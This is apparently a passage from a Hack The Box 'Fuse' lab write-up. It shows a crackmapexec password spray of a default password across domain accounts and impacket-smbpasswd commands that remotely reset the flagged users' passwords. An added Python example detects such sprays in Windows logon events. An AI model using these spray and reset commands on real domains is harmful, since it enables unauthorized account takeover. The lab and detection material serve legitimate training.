Default Password Theory


Considering the following:

  • STATUS_PASSWORD_MUST_CHANGE was returned for the bnielson user when attempting to authenticate to the SMB server
  • The bnielson user is indeed the new starter.
  • It is very common practice among sysadmins to set "User must change password at next logon" for new users

There is a high probability that the password, Fabricorp01, is the organization's default password, in which case there may be other users with the same password.

Password Spray


┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ cme smb $IP -d FABRICORP.LOCAL --kdcHost fuse.fabricorp.local -u users -p Fabricorp01 --continue-on-success
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:FABRICORP.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\Guest:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\krbtgt:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\svc-print:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\svc-scan:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\dandrews:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\mberbatov:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\dmuir:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\astein:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\sthompson:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\bnielson:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\fuse:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\pmerton:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP.LOCAL\administrator:Fabricorp01 STATUS_LOGON_FAILURE 

It turns out there are two additional users that return the STATUS_PASSWORD_MUST_CHANGE error: tlavel and bhult. This means that I am able to change their passwords remotely, just like it was done for the bnielson user.
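The defender's side of the spray above, as an added example that is not part of this writeup: given already-parsed Windows Security event 4625 records (a constructed sample; the field layout and source IPs are assumptions), flag a single source failing against many accounts within a short window, and single out the accounts whose sub-status 0xC0000224 (STATUS_PASSWORD_MUST_CHANGE) shows the sprayed password was actually correct, which is the same signal the writeup reads off the crackmapexec output.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS values seen in the SubStatus field of Windows Security event 4625.
SUBSTATUS = {
    "0xC000006D": "STATUS_LOGON_FAILURE",         # wrong user name or password
    "0xC0000224": "STATUS_PASSWORD_MUST_CHANGE",  # password correct, change required
    "0xC0000071": "STATUS_PASSWORD_EXPIRED",      # password correct, but expired
}
# A logon that fails with one of these still proves the supplied password was right.
PASSWORD_WAS_CORRECT = {"0xC0000224", "0xC0000071"}

# Constructed sample of parsed 4625 events: (TimeCreated, IpAddress, TargetUserName, SubStatus).
# 10.10.14.5 sprays one password across many accounts; 10.10.10.50 is one user mistyping.
EVENTS = [
    ("2024-01-01T10:00:00", "10.10.14.5",  "Guest",     "0xC000006D"),
    ("2024-01-01T10:00:01", "10.10.14.5",  "svc-print", "0xC000006D"),
    ("2024-01-01T10:00:01", "10.10.14.5",  "dandrews",  "0xC000006D"),
    ("2024-01-01T10:00:02", "10.10.14.5",  "bnielson",  "0xC0000224"),
    ("2024-01-01T10:00:02", "10.10.14.5",  "pmerton",   "0xC000006D"),
    ("2024-01-01T10:00:03", "10.10.14.5",  "tlavel",    "0xC0000224"),
    ("2024-01-01T10:00:03", "10.10.14.5",  "bhult",     "0xC0000224"),
    ("2024-01-01T10:00:04", "10.10.14.5",  "astein",    "0xC000006D"),
    ("2024-01-01T10:05:00", "10.10.10.50", "dmuir",     "0xC000006D"),
    ("2024-01-01T10:05:30", "10.10.10.50", "dmuir",     "0xC000006D"),
]


def detect_spray(events, min_users=5, window=timedelta(minutes=5)):
    """Return {source_ip: {"users": set, "password_hits": set}} for each source whose
    failed logons hit at least `min_users` distinct accounts inside `window`; the
    `password_hits` are the accounts where the sub-status proves the password was right."""
    by_src = defaultdict(list)
    for ts, src, user, sub in events:
        by_src[src].append((datetime.fromisoformat(ts), user, sub))
    findings = {}
    for src, rows in by_src.items():
        rows.sort()
        # Slide a window forward from each failure and count distinct target accounts.
        for i, (t0, _, _) in enumerate(rows):
            in_win = [r for r in rows[i:] if r[0] - t0 <= window]
            users = {u for _, u, _ in in_win}
            if len(users) >= min_users:
                hits = {u for _, u, s in in_win if s in PASSWORD_WAS_CORRECT}
                findings[src] = {"users": users, "password_hits": hits}
                break
    return findings
```

On the sample, only 10.10.14.5 is flagged, and its password_hits set is exactly the three accounts the spray above showed as STATUS_PASSWORD_MUST_CHANGE.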

Remote Password Reset


┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-smbpasswd fabricorp.local/tlavel:Fabricorp01@$IP -newpass Qwer0000  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-smbpasswd fabricorp.local/bhult:Fabricorp01@$IP -newpass Qwer0000 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

Just like for the bnielson user, all the passwords get reset periodically due to the suspected background task. I would have to keep resetting users' passwords as I go along.